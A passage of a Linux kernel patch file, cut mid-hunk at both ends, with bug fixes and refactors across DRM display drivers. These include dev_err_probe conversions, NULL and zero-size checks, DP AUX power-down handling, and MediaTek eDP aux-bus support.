+--- a/drivers/gpu/drm/bridge/analogix/anx7625.c
++++ b/drivers/gpu/drm/bridge/analogix/anx7625.c
+@@ -2077,10 +2077,8 @@ static int anx7625_setup_dsi_device(struct anx7625_data *ctx)
+ 	};
+ 
+ 	host = of_find_mipi_dsi_host_by_node(ctx->pdata.mipi_host_node);
+-	if (!host) {
+-		DRM_DEV_ERROR(dev, "fail to find dsi host.\n");
+-		return -EPROBE_DEFER;
+-	}
++	if (!host)
++		return dev_err_probe(dev, -EPROBE_DEFER, "fail to find dsi host.\n");
+ 
+ 	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
+ 	if (IS_ERR(dsi)) {
+diff --git a/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-core.c b/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-core.c
+index 31442a9225029..1b7c14d7c5ee3 100644
+--- a/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-core.c
++++ b/drivers/gpu/drm/bridge/cadence/cdns-mhdp8546-core.c
+@@ -2042,6 +2042,9 @@ static void cdns_mhdp_atomic_enable(struct drm_bridge *bridge,
+ 	mhdp_state = to_cdns_mhdp_bridge_state(new_state);
+ 
+ 	mhdp_state->current_mode = drm_mode_duplicate(bridge->dev, mode);
++	if (!mhdp_state->current_mode)
++		return;
++
+ 	drm_mode_set_name(mhdp_state->current_mode);
+ 
+ 	dev_dbg(mhdp->dev, "%s: Enabling mode %s\n", __func__, mode->name);
+diff --git a/drivers/gpu/drm/bridge/chipone-icn6211.c b/drivers/gpu/drm/bridge/chipone-icn6211.c
+index bf920c3503aa3..3459a696b34fc 100644
+--- a/drivers/gpu/drm/bridge/chipone-icn6211.c
++++ b/drivers/gpu/drm/bridge/chipone-icn6211.c
+@@ -563,10 +563,8 @@ static int chipone_dsi_host_attach(struct chipone *icn)
+ 
+ 	host = of_find_mipi_dsi_host_by_node(host_node);
+ 	of_node_put(host_node);
+-	if (!host) {
+-		dev_err(dev, "failed to find dsi host\n");
+-		return -EPROBE_DEFER;
+-	}
++	if (!host)
++		return dev_err_probe(dev, -EPROBE_DEFER, "failed to find dsi host\n");
+ 
+ 	dsi = mipi_dsi_device_register_full(host, &info);
+ 	if (IS_ERR(dsi)) {
+diff --git a/drivers/gpu/drm/bridge/lontium-lt8912b.c b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+index ac76c23635892..55a7fa4670a7a 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt8912b.c
++++ b/drivers/gpu/drm/bridge/lontium-lt8912b.c
+@@ -485,10 +485,8 @@ static int lt8912_attach_dsi(struct lt8912 *lt)
+ 						 };
+ 
+ 	host = of_find_mipi_dsi_host_by_node(lt->host_node);
+-	if (!host) {
+-		dev_err(dev, "failed to find dsi host\n");
+-		return -EPROBE_DEFER;
+-	}
++	if (!host)
++		return dev_err_probe(dev, -EPROBE_DEFER, "failed to find dsi host\n");
+ 
+ 	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
+ 	if (IS_ERR(dsi)) {
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611.c b/drivers/gpu/drm/bridge/lontium-lt9611.c
+index ae8c6d9d4095f..e40ceb56ff55f 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt9611.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611.c
+@@ -777,10 +777,8 @@ static struct mipi_dsi_device *lt9611_attach_dsi(struct lt9611 *lt9611,
+ 	int ret;
+ 
+ 	host = of_find_mipi_dsi_host_by_node(dsi_node);
+-	if (!host) {
+-		dev_err(lt9611->dev, "failed to find dsi host\n");
+-		return ERR_PTR(-EPROBE_DEFER);
+-	}
++	if (!host)
++		return ERR_PTR(dev_err_probe(lt9611->dev, -EPROBE_DEFER, "failed to find dsi host\n"));
+ 
+ 	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
+ 	if (IS_ERR(dsi)) {
+diff --git a/drivers/gpu/drm/bridge/lontium-lt9611uxc.c b/drivers/gpu/drm/bridge/lontium-lt9611uxc.c
+index 818848b2c04dd..cb75da940b890 100644
+--- a/drivers/gpu/drm/bridge/lontium-lt9611uxc.c
++++ b/drivers/gpu/drm/bridge/lontium-lt9611uxc.c
+@@ -263,10 +263,8 @@ static struct mipi_dsi_device *lt9611uxc_attach_dsi(struct lt9611uxc *lt9611uxc,
+ 	int ret;
+ 
+ 	host = of_find_mipi_dsi_host_by_node(dsi_node);
+-	if (!host) {
+-		dev_err(dev, "failed to find dsi host\n");
+-		return ERR_PTR(-EPROBE_DEFER);
+-	}
++	if (!host)
++		return ERR_PTR(dev_err_probe(dev, -EPROBE_DEFER, "failed to find dsi host\n"));
+ 
+ 	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
+ 	if (IS_ERR(dsi)) {
+diff --git a/drivers/gpu/drm/bridge/tc358775.c b/drivers/gpu/drm/bridge/tc358775.c
+index 02dc12b8151e7..40d6da7743325 100644
+--- a/drivers/gpu/drm/bridge/tc358775.c
++++ b/drivers/gpu/drm/bridge/tc358775.c
+@@ -455,10 +455,6 @@ static void tc_bridge_enable(struct drm_bridge *bridge)
+ 	dev_dbg(tc->dev, "bus_formats %04x bpc %d\n",
+ 		connector->display_info.bus_formats[0],
+ 		tc->bpc);
+-	/*
+-	 * Default hardware register settings of tc358775 configured
+-	 * with MEDIA_BUS_FMT_RGB888_1X7X4_JEIDA jeida-24 format
+-	 */
+ 	if (connector->display_info.bus_formats[0] ==
+ 		MEDIA_BUS_FMT_RGB888_1X7X4_SPWG) {
+ 		/* VESA-24 */
+@@ -469,14 +465,15 @@ static void tc_bridge_enable(struct drm_bridge *bridge)
+ 		d2l_write(tc->i2c, LV_MX1619, LV_MX(LVI_B6, LVI_B7, LVI_B1, LVI_B2));
+ 		d2l_write(tc->i2c, LV_MX2023, LV_MX(LVI_B3, LVI_B4, LVI_B5, LVI_L0));
+ 		d2l_write(tc->i2c, LV_MX2427, LV_MX(LVI_HS, LVI_VS, LVI_DE, LVI_R6));
+-	} else { /*  MEDIA_BUS_FMT_RGB666_1X7X3_SPWG - JEIDA-18 */
+-		d2l_write(tc->i2c, LV_MX0003, LV_MX(LVI_R0, LVI_R1, LVI_R2, LVI_R3));
+-		d2l_write(tc->i2c, LV_MX0407, LV_MX(LVI_R4, LVI_L0, LVI_R5, LVI_G0));
+-		d2l_write(tc->i2c, LV_MX0811, LV_MX(LVI_G1, LVI_G2, LVI_L0, LVI_L0));
+-		d2l_write(tc->i2c, LV_MX1215, LV_MX(LVI_G3, LVI_G4, LVI_G5, LVI_B0));
+-		d2l_write(tc->i2c, LV_MX1619, LV_MX(LVI_L0, LVI_L0, LVI_B1, LVI_B2));
+-		d2l_write(tc->i2c, LV_MX2023, LV_MX(LVI_B3, LVI_B4, LVI_B5, LVI_L0));
+-		d2l_write(tc->i2c, LV_MX2427, LV_MX(LVI_HS, LVI_VS, LVI_DE, LVI_L0));
++	} else {
++		/* JEIDA-18 and JEIDA-24 */
++		d2l_write(tc->i2c, LV_MX0003, LV_MX(LVI_R2, LVI_R3, LVI_R4, LVI_R5));
++		d2l_write(tc->i2c, LV_MX0407, LV_MX(LVI_R6, LVI_R1, LVI_R7, LVI_G2));
++		d2l_write(tc->i2c, LV_MX0811, LV_MX(LVI_G3, LVI_G4, LVI_G0, LVI_G1));
++		d2l_write(tc->i2c, LV_MX1215, LV_MX(LVI_G5, LVI_G6, LVI_G7, LVI_B2));
++		d2l_write(tc->i2c, LV_MX1619, LV_MX(LVI_B0, LVI_B1, LVI_B3, LVI_B4));
++		d2l_write(tc->i2c, LV_MX2023, LV_MX(LVI_B5, LVI_B6, LVI_B7, LVI_L0));
++		d2l_write(tc->i2c, LV_MX2427, LV_MX(LVI_HS, LVI_VS, LVI_DE, LVI_R0));
+ 	}
+ 
+ 	d2l_write(tc->i2c, VFUEN, VFUEN_EN);
+@@ -611,10 +608,8 @@ static int tc_attach_host(struct tc_data *tc)
+ 						};
+ 
+ 	host = of_find_mipi_dsi_host_by_node(tc->host_node);
+-	if (!host) {
+-		dev_err(dev, "failed to find dsi host\n");
+-		return -EPROBE_DEFER;
+-	}
++	if (!host)
++		return dev_err_probe(dev, -EPROBE_DEFER, "failed to find dsi host\n");
+ 
+ 	dsi = devm_mipi_dsi_device_register_full(dev, host, &info);
+ 	if (IS_ERR(dsi)) {
+diff --git a/drivers/gpu/drm/bridge/ti-dlpc3433.c b/drivers/gpu/drm/bridge/ti-dlpc3433.c
+index 186a9e2ff24dc..d1684e66d9e3d 100644
+--- a/drivers/gpu/drm/bridge/ti-dlpc3433.c
++++ b/drivers/gpu/drm/bridge/ti-dlpc3433.c
+@@ -319,12 +319,11 @@ static int dlpc_host_attach(struct dlpc *dlpc)
+ 		.channel = 0,
+ 		.node = NULL,
+ 	};
++	int ret;
+ 
+ 	host = of_find_mipi_dsi_host_by_node(dlpc->host_node);
+-	if (!host) {
+-		DRM_DEV_ERROR(dev, "failed to find dsi host\n");
+-		return -EPROBE_DEFER;
+-	}
++	if (!host)
++		return dev_err_probe(dev, -EPROBE_DEFER, "failed to find dsi host\n");
+ 
+ 	dlpc->dsi = mipi_dsi_device_register_full(host, &info);
+ 	if (IS_ERR(dlpc->dsi)) {
+@@ -336,7 +335,11 @@ static int dlpc_host_attach(struct dlpc *dlpc)
+ 	dlpc->dsi->format = MIPI_DSI_FMT_RGB565;
+ 	dlpc->dsi->lanes = dlpc->dsi_lanes;
+ 
+-	return devm_mipi_dsi_attach(dev, dlpc->dsi);
++	ret = devm_mipi_dsi_attach(dev, dlpc->dsi);
++	if (ret)
++		DRM_DEV_ERROR(dev, "failed to attach dsi host\n");
++
++	return ret;
+ }
+ 
+ static int dlpc3433_probe(struct i2c_client *client)
+@@ -367,10 +370,8 @@ static int dlpc3433_probe(struct i2c_client *client)
+ 	drm_bridge_add(&dlpc->bridge);
+ 
+ 	ret = dlpc_host_attach(dlpc);
+-	if (ret) {
+-		DRM_DEV_ERROR(dev, "failed to attach dsi host\n");
++	if (ret)
+ 		goto err_remove_bridge;
+-	}
+ 
+ 	return 0;
+ 
+diff --git a/drivers/gpu/drm/bridge/ti-sn65dsi83.c b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+index 3f43b44145a89..52008a72bd49a 100644
+--- a/drivers/gpu/drm/bridge/ti-sn65dsi83.c
++++ b/drivers/gpu/drm/bridge/ti-sn65dsi83.c
+@@ -478,7 +478,6 @@ static void sn65dsi83_atomic_pre_enable(struct drm_bridge *bridge,
+ 		dev_err(ctx->dev, "failed to lock PLL, ret=%i\n", ret);
+ 		/* On failure, disable PLL again and exit. */
+ 		regmap_write(ctx->regmap, REG_RC_PLL_EN, 0x00);
+-		regulator_disable(ctx->vcc);
+ 		return;
+ 	}
+ 
+diff --git a/drivers/gpu/drm/display/drm_dp_helper.c b/drivers/gpu/drm/display/drm_dp_helper.c
+index 16565a0a5da6d..e839981c7b2f7 100644
+--- a/drivers/gpu/drm/display/drm_dp_helper.c
++++ b/drivers/gpu/drm/display/drm_dp_helper.c
+@@ -532,6 +532,15 @@ static int drm_dp_dpcd_access(struct drm_dp_aux *aux, u8 request,
+ 
+ 	mutex_lock(&aux->hw_mutex);
+ 
++	/*
++	 * If the device attached to the aux bus is powered down then there's
++	 * no reason to attempt a transfer. Error out immediately.
++	 */
++	if (aux->powered_down) {
++		ret = -EBUSY;
++		goto unlock;
++	}
++
+ 	/*
+ 	 * The specification doesn't give any recommendation on how often to
+ 	 * retry native transactions. We used to retry 7 times like for
+@@ -599,6 +608,29 @@ int drm_dp_dpcd_probe(struct drm_dp_aux *aux, unsigned int offset)
+ }
+ EXPORT_SYMBOL(drm_dp_dpcd_probe);
+ 
++/**
++ * drm_dp_dpcd_set_powered() - Set whether the DP device is powered
++ * @aux: DisplayPort AUX channel; for convenience it's OK to pass NULL here
++ *       and the function will be a no-op.
++ * @powered: true if powered; false if not
++ *
++ * If the endpoint device on the DP AUX bus is known to be powered down
++ * then this function can be called to make future transfers fail immediately
++ * instead of needing to time out.
++ *
++ * If this function is never called then a device defaults to being powered.
++ */
++void drm_dp_dpcd_set_powered(struct drm_dp_aux *aux, bool powered)
++{
++	if (!aux)
++		return;
++
++	mutex_lock(&aux->hw_mutex);
++	aux->powered_down = !powered;
++	mutex_unlock(&aux->hw_mutex);
++}
++EXPORT_SYMBOL(drm_dp_dpcd_set_powered);
++
+ /**
+  * drm_dp_dpcd_read() - read a series of bytes from the DPCD
+  * @aux: DisplayPort AUX channel (SST or MST)
+@@ -1855,6 +1887,9 @@ static int drm_dp_i2c_xfer(struct i2c_adapter *adapter, struct i2c_msg *msgs,
+ 	struct drm_dp_aux_msg msg;
+ 	int err = 0;
+ 
++	if (aux->powered_down)
++		return -EBUSY;
++
+ 	dp_aux_i2c_transfer_size = clamp(dp_aux_i2c_transfer_size, 1, DP_AUX_MAX_PAYLOAD_BYTES);
+ 
+ 	memset(&msg, 0, sizeof(msg));
+diff --git a/drivers/gpu/drm/drm_bridge.c b/drivers/gpu/drm/drm_bridge.c
+index 7044e339a82cd..f802548798044 100644
+--- a/drivers/gpu/drm/drm_bridge.c
++++ b/drivers/gpu/drm/drm_bridge.c
+@@ -755,11 +755,17 @@ void drm_atomic_bridge_chain_post_disable(struct drm_bridge *bridge,
+ 				 */
+ 				list_for_each_entry_from(next, &encoder->bridge_chain,
+ 							 chain_node) {
+-					if (next->pre_enable_prev_first) {
++					if (!next->pre_enable_prev_first) {
+ 						next = list_prev_entry(next, chain_node);
+ 						limit = next;
+ 						break;
+ 					}
++
++					if (list_is_last(&next->chain_node,
++							 &encoder->bridge_chain)) {
++						limit = next;
++						break;
++					}
+ 				}
+ 
+ 				/* Call these bridges in reverse order */
+@@ -842,7 +848,7 @@ void drm_atomic_bridge_chain_pre_enable(struct drm_bridge *bridge,
+ 					/* Found first bridge that does NOT
+ 					 * request prev to be enabled first
+ 					 */
+-					limit = list_prev_entry(next, chain_node);
++					limit = next;
+ 					break;
+ 				}
+ 			}
+diff --git a/drivers/gpu/drm/drm_mipi_dsi.c b/drivers/gpu/drm/drm_mipi_dsi.c
+index ef7ec68867df0..112f213cc8d9b 100644
+--- a/drivers/gpu/drm/drm_mipi_dsi.c
++++ b/drivers/gpu/drm/drm_mipi_dsi.c
+@@ -653,7 +653,7 @@ EXPORT_SYMBOL(mipi_dsi_set_maximum_return_packet_size);
+  *
+  * Return: 0 on success or a negative error code on failure.
+  */
+-ssize_t mipi_dsi_compression_mode(struct mipi_dsi_device *dsi, bool enable)
++int mipi_dsi_compression_mode(struct mipi_dsi_device *dsi, bool enable)
+ {
+ 	/* Note: Needs updating for non-default PPS or algorithm */
+ 	u8 tx[2] = { enable << 0, 0 };
+@@ -678,8 +678,8 @@ EXPORT_SYMBOL(mipi_dsi_compression_mode);
+  *
+  * Return: 0 on success or a negative error code on failure.
+  */
+-ssize_t mipi_dsi_picture_parameter_set(struct mipi_dsi_device *dsi,
+-				       const struct drm_dsc_picture_parameter_set *pps)
++int mipi_dsi_picture_parameter_set(struct mipi_dsi_device *dsi,
++				   const struct drm_dsc_picture_parameter_set *pps)
+ {
+ 	struct mipi_dsi_msg msg = {
+ 		.channel = dsi->channel,
+diff --git a/drivers/gpu/drm/i915/gt/uc/abi/guc_klvs_abi.h b/drivers/gpu/drm/i915/gt/uc/abi/guc_klvs_abi.h
+index 4a59478c3b5c4..bbeceb640d31e 100644
+--- a/drivers/gpu/drm/i915/gt/uc/abi/guc_klvs_abi.h
++++ b/drivers/gpu/drm/i915/gt/uc/abi/guc_klvs_abi.h
+@@ -29,9 +29,9 @@
+  */
+ 
+ #define GUC_KLV_LEN_MIN				1u
+-#define GUC_KLV_0_KEY				(0xffff << 16)
+-#define GUC_KLV_0_LEN				(0xffff << 0)
+-#define GUC_KLV_n_VALUE				(0xffffffff << 0)
++#define GUC_KLV_0_KEY				(0xffffu << 16)
++#define GUC_KLV_0_LEN				(0xffffu << 0)
++#define GUC_KLV_n_VALUE				(0xffffffffu << 0)
+ 
+ /**
+  * DOC: GuC Self Config KLVs
+diff --git a/drivers/gpu/drm/mediatek/Kconfig b/drivers/gpu/drm/mediatek/Kconfig
+index 369e495d0c3e8..d1eededee9434 100644
+--- a/drivers/gpu/drm/mediatek/Kconfig
++++ b/drivers/gpu/drm/mediatek/Kconfig
+@@ -27,6 +27,7 @@ config DRM_MEDIATEK_DP
+ 	select PHY_MTK_DP
+ 	select DRM_DISPLAY_HELPER
+ 	select DRM_DISPLAY_DP_HELPER
++	select DRM_DP_AUX_BUS
+ 	help
+ 	  DRM/KMS Display Port driver for MediaTek SoCs.
+ 
+diff --git a/drivers/gpu/drm/mediatek/mtk_dp.c b/drivers/gpu/drm/mediatek/mtk_dp.c
+index 519e23a2a017c..c24eeb7ffde7d 100644
+--- a/drivers/gpu/drm/mediatek/mtk_dp.c
++++ b/drivers/gpu/drm/mediatek/mtk_dp.c
+@@ -4,6 +4,7 @@
+  * Copyright (c) 2022 BayLibre
+  */
+ 
++#include <drm/display/drm_dp_aux_bus.h>
+ #include <drm/display/drm_dp.h>
+ #include <drm/display/drm_dp_helper.h>
+ #include <drm/drm_atomic_helper.h>
+@@ -1284,9 +1285,11 @@ static void mtk_dp_power_disable(struct mtk_dp *mtk_dp)
+ 
+ static void mtk_dp_initialize_priv_data(struct mtk_dp *mtk_dp)
+ {
++	bool plugged_in = (mtk_dp->bridge.type == DRM_MODE_CONNECTOR_eDP);
++
+ 	mtk_dp->train_info.link_rate = DP_LINK_BW_5_4;
+ 	mtk_dp->train_info.lane_count = mtk_dp->max_lanes;
+-	mtk_dp->train_info.cable_plugged_in = false;
++	mtk_dp->train_info.cable_plugged_in = plugged_in;
+ 
+ 	mtk_dp->info.format = DP_PIXELFORMAT_RGB;
+ 	memset(&mtk_dp->info.vm, 0, sizeof(struct videomode));
+@@ -1588,6 +1591,16 @@ static int mtk_dp_parse_capabilities(struct mtk_dp *mtk_dp)
+ 	u8 val;
+ 	ssize_t ret;
+ 
++	/*
++	 * If we're eDP and capabilities were already parsed we can skip
++	 * reading again because eDP panels aren't hotpluggable hence the
++	 * caps and training information won't ever change in a boot life
++	 */
++	if (mtk_dp->bridge.type == DRM_MODE_CONNECTOR_eDP &&
++	    mtk_dp->rx_cap[DP_MAX_LINK_RATE] &&
++	    mtk_dp->train_info.sink_ssc)
++		return 0;
++
+ 	ret = drm_dp_read_dpcd_caps(&mtk_dp->aux, mtk_dp->rx_cap);
+ 	if (ret < 0)
+ 		return ret;
+@@ -2037,16 +2050,15 @@ static struct edid *mtk_dp_get_edid(struct drm_bridge *bridge,
+ static ssize_t mtk_dp_aux_transfer(struct drm_dp_aux *mtk_aux,
+ 				   struct drm_dp_aux_msg *msg)
+ {
+-	struct mtk_dp *mtk_dp;
++	struct mtk_dp *mtk_dp = container_of(mtk_aux, struct mtk_dp, aux);
+ 	bool is_read;
+ 	u8 request;
+ 	size_t accessed_bytes = 0;
+ 	int ret;
+ 
+-	mtk_dp = container_of(mtk_aux, struct mtk_dp, aux);
+-
+-	if (!mtk_dp->train_info.cable_plugged_in) {
+-		ret = -EAGAIN;
++	if (mtk_dp->bridge.type != DRM_MODE_CONNECTOR_eDP &&
++	    !mtk_dp->train_info.cable_plugged_in) {
++		ret = -EIO;
+ 		goto err;
+ 	}
+ 
+@@ -2490,6 +2502,51 @@ static int mtk_dp_register_audio_driver(struct device *dev)
+ 	return PTR_ERR_OR_ZERO(mtk_dp->audio_pdev);
+ }
+ 
++static int mtk_dp_register_phy(struct mtk_dp *mtk_dp)
++{
++	struct device *dev = mtk_dp->dev;
++
++	mtk_dp->phy_dev = platform_device_register_data(dev, "mediatek-dp-phy",
++							PLATFORM_DEVID_AUTO,
++							&mtk_dp->regs,
++							sizeof(struct regmap *));
++	if (IS_ERR(mtk_dp->phy_dev))
++		return dev_err_probe(dev, PTR_ERR(mtk_dp->phy_dev),
++				     "Failed to create device mediatek-dp-phy\n");
++
++	mtk_dp_get_calibration_data(mtk_dp);
++
++	mtk_dp->phy = devm_phy_get(&mtk_dp->phy_dev->dev, "dp");
++	if (IS_ERR(mtk_dp->phy)) {
++		platform_device_unregister(mtk_dp->phy_dev);
++		return dev_err_probe(dev, PTR_ERR(mtk_dp->phy), "Failed to get phy\n");
++	}
++
++	return 0;
++}
++
++static int mtk_dp_edp_link_panel(struct drm_dp_aux *mtk_aux)
++{
++	struct mtk_dp *mtk_dp = container_of(mtk_aux, struct mtk_dp, aux);
++	struct device *dev = mtk_aux->dev;
++	int ret;
++
++	mtk_dp->next_bridge = devm_drm_of_get_bridge(dev, dev->of_node, 1, 0);
++
++	/* Power off the DP and AUX: either detection is done, or no panel present */
++	mtk_dp_update_bits(mtk_dp, MTK_DP_TOP_PWR_STATE,
++			   DP_PWR_STATE_BANDGAP_TPLL,
++			   DP_PWR_STATE_MASK);
++	mtk_dp_power_disable(mtk_dp);
++
++	if (IS_ERR(mtk_dp->next_bridge)) {
++		ret = PTR_ERR(mtk_dp->next_bridge);
++		mtk_dp->next_bridge = NULL;
++		return ret;
++	}
++	return 0;
++}
++
+ static int mtk_dp_probe(struct platform_device *pdev)
+ {
+ 	struct mtk_dp *mtk_dp;
+@@ -2508,21 +2565,14 @@ static int mtk_dp_probe(struct platform_device *pdev)
+ 		return dev_err_probe(dev, irq_num,
+ 				     "failed to request dp irq resource\n");
+ 
+-	mtk_dp->next_bridge = devm_drm_of_get_bridge(dev, dev->of_node, 1, 0);
+-	if (IS_ERR(mtk_dp->next_bridge) &&
+-	    PTR_ERR(mtk_dp->next_bridge) == -ENODEV)
+-		mtk_dp->next_bridge = NULL;
+-	else if (IS_ERR(mtk_dp->next_bridge))
+-		return dev_err_probe(dev, PTR_ERR(mtk_dp->next_bridge),
+-				     "Failed to get bridge\n");
+-
+ 	ret = mtk_dp_dt_parse(mtk_dp, pdev);
+ 	if (ret)
+ 		return dev_err_probe(dev, ret, "Failed to parse dt\n");
+ 
+-	drm_dp_aux_init(&mtk_dp->aux);
+ 	mtk_dp->aux.name = "aux_mtk_dp";
++	mtk_dp->aux.dev = dev;
+ 	mtk_dp->aux.transfer = mtk_dp_aux_transfer;
++	drm_dp_aux_init(&mtk_dp->aux);
+ 
+ 	spin_lock_init(&mtk_dp->irq_thread_lock);
+ 
+@@ -2547,23 +2597,9 @@ static int mtk_dp_probe(struct platform_device *pdev)
+ 		}
+ 	}
+ 
+-	mtk_dp->phy_dev = platform_device_register_data(dev, "mediatek-dp-phy",
+-							PLATFORM_DEVID_AUTO,
+-							&mtk_dp->regs,
+-							sizeof(struct regmap *));
+-	if (IS_ERR(mtk_dp->phy_dev))
+-		return dev_err_probe(dev, PTR_ERR(mtk_dp->phy_dev),
+-				     "Failed to create device mediatek-dp-phy\n");
+-
+-	mtk_dp_get_calibration_data(mtk_dp);
+-
+-	mtk_dp->phy = devm_phy_get(&mtk_dp->phy_dev->dev, "dp");
+-
+-	if (IS_ERR(mtk_dp->phy)) {
+-		platform_device_unregister(mtk_dp->phy_dev);
+-		return dev_err_probe(dev, PTR_ERR(mtk_dp->phy),
+-				     "Failed to get phy\n");
+-	}
++	ret = mtk_dp_register_phy(mtk_dp);
++	if (ret)
++		return ret;
+ 
+ 	mtk_dp->bridge.funcs = &mtk_dp_bridge_funcs;
+ 	mtk_dp->bridge.of_node = dev->of_node;
+@@ -2577,6 +2613,43 @@ static int mtk_dp_probe(struct platform_device *pdev)
+ 	mtk_dp->need_debounce = true;
+ 	timer_setup(&mtk_dp->debounce_timer, mtk_dp_debounce_timer, 0);
+ 
++	if (mtk_dp->bridge.type == DRM_MODE_CONNECTOR_eDP) {
++		/*
++		 * Set the data lanes to idle in case the bootloader didn't
++		 * properly close the eDP port to avoid stalls and then
++		 * reinitialize, reset and power on the AUX block.
++		 */
++		mtk_dp_set_idle_pattern(mtk_dp, true);
++		mtk_dp_initialize_aux_settings(mtk_dp);
++		mtk_dp_power_enable(mtk_dp);
++
++		/*
++		 * Power on the AUX to allow reading the EDID from aux-bus:
++		 * please note that it is necessary to call power off in the
++		 * .done_probing() callback (mtk_dp_edp_link_panel), as only
++		 * there we can safely assume that we finished reading EDID.
++		 */
++		mtk_dp_update_bits(mtk_dp, MTK_DP_TOP_PWR_STATE,
++				   DP_PWR_STATE_BANDGAP_TPLL_LANE,
++				   DP_PWR_STATE_MASK);
++
++		ret = devm_of_dp_aux_populate_bus(&mtk_dp->aux, mtk_dp_edp_link_panel);
++		if (ret) {
++			/* -ENODEV this means that the panel is not on the aux-bus */
++			if (ret == -ENODEV) {
++				ret = mtk_dp_edp_link_panel(&mtk_dp->aux);
++				if (ret)
++					return ret;
++			} else {
++				mtk_dp_update_bits(mtk_dp, MTK_DP_TOP_PWR_STATE,
++						   DP_PWR_STATE_BANDGAP_TPLL,
++						   DP_PWR_STATE_MASK);
++				mtk_dp_power_disable(mtk_dp);
++				return ret;
++			}
++		}
++	}
++
+ 	pm_runtime_enable(dev);
+ 	pm_runtime_get_sync(dev);
+ 
+diff --git a/drivers/gpu/drm/mediatek/mtk_drm_gem.c b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+index fb4f0e336b60e..21e584038581d 100644
+--- a/drivers/gpu/drm/mediatek/mtk_drm_gem.c
++++ b/drivers/gpu/drm/mediatek/mtk_drm_gem.c
+@@ -33,6 +33,9 @@ static struct mtk_drm_gem_obj *mtk_drm_gem_init(struct drm_device *dev,
+ 
+ 	size = round_up(size, PAGE_SIZE);
+ 
++	if (size == 0)
++		return ERR_PTR(-EINVAL);
++
+ 	mtk_gem_obj = kzalloc(sizeof(*mtk_gem_obj), GFP_KERNEL);
+ 	if (!mtk_gem_obj)
+ 		return ERR_PTR(-ENOMEM);
+diff --git a/drivers/gpu/drm/meson/meson_vclk.c b/drivers/gpu/drm/meson/meson_vclk.c
+index 2a82119eb58ed..2a942dc6a6dc2 100644
+--- a/drivers/gpu/drm/meson/meson_vclk.c
++++ b/drivers/gpu/drm/meson/meson_vclk.c
+@@ -790,13 +790,13 @@ meson_vclk_vic_supported_freq(struct meson_drm *priv, unsigned int phy_freq,
+ 				 FREQ_1000_1001(params[i].pixel_freq));
+ 		DRM_DEBUG_DRIVER("i = %d phy_freq = %d alt = %d\n",
+ 				 i, params[i].phy_freq,
+-				 FREQ_1000_1001(params[i].phy_freq/10)*10);
++				 FREQ_1000_1001(params[i].phy_freq/1000)*1000);
+ 		/* Match strict frequency */
+ 		if (phy_freq == params[i].phy_freq &&
+ 		    vclk_freq == params[i].vclk_freq)
+ 			return MODE_OK;
+ 		/* Match 1000/1001 variant */
+-		if (phy_freq == (FREQ_1000_1001(params[i].phy_freq/10)*10) &&
++		if (phy_freq == (FREQ_1000_1001(params[i].phy_freq/1000)*1000) &&
+ 		    vclk_freq == FREQ_1000_1001(params[i].vclk_freq))
+ 			return MODE_OK;
+ 	}
+@@ -1070,7 +1070,7 @@ void meson_vclk_setup(struct meson_drm *priv, unsigned int target,
+ 
+ 	for (freq = 0 ; params[freq].pixel_freq ; ++freq) {
+ 		if ((phy_freq == params[freq].phy_freq ||
+-		     phy_freq == FREQ_1000_1001(params[freq].phy_freq/10)*10) &&
++		     phy_freq == FREQ_1000_1001(params[freq].phy_freq/1000)*1000) &&
+ 		    (vclk_freq == params[freq].vclk_freq ||
+ 		     vclk_freq == FREQ_1000_1001(params[freq].vclk_freq))) {
+ 			if (vclk_freq != params[freq].vclk_freq)
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+index 95e73eddc5e91..d6a810b7cfa2c 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+@@ -2036,18 +2036,12 @@ struct msm_gpu *a6xx_gpu_init(struct drm_device *dev)
+ 			adreno_cmp_rev(ADRENO_REV(6, 3, 5, ANY_ID), info->rev)))
+ 		adreno_gpu->base.hw_apriv = true;
+ 
+-	/*
+-	 * For now only clamp to idle freq for devices where this is known not
+-	 * to cause power supply issues:
+-	 */
+-	if (info && (info->revn == 618))
+-		gpu->clamp_to_idle = true;
+-
+ 	a6xx_llc_slices_init(pdev, a6xx_gpu);
+ 
+ 	ret = a6xx_set_supported_hw(&pdev->dev, config->rev);
+ 	if (ret) {
+-		a6xx_destroy(&(a6xx_gpu->base.base));
++		a6xx_llc_slices_destroy(a6xx_gpu);
++		kfree(a6xx_gpu);
+ 		return ERR_PTR(ret);
+ 	}
+ 
+@@ -2057,6 +2051,13 @@ struct msm_gpu *a6xx_gpu_init(struct drm_device *dev)
+ 		return ERR_PTR(ret);
+ 	}
+ 
++	/*
++	 * For now only clamp to idle freq for devices where this is known not
++	 * to cause power supply issues:
++	 */
++	if (adreno_is_a618(adreno_gpu) || adreno_is_7c3(adreno_gpu))
++		gpu->clamp_to_idle = true;
++
+ 	/* Check if there is a GMU phandle and set it up */
+ 	node = of_parse_phandle(pdev->dev.of_node, "qcom,gmu", 0);
+ 
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_cmd.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_cmd.c
+index ae28b2b93e697..ce58d97818bcd 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_cmd.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_encoder_phys_cmd.c
+@@ -439,9 +439,6 @@ static void dpu_encoder_phys_cmd_enable_helper(
+ 
+ 	_dpu_encoder_phys_cmd_pingpong_config(phys_enc);
+ 
+-	if (!dpu_encoder_phys_cmd_is_master(phys_enc))
+-		return;
+-
+ 	ctl = phys_enc->hw_ctl;
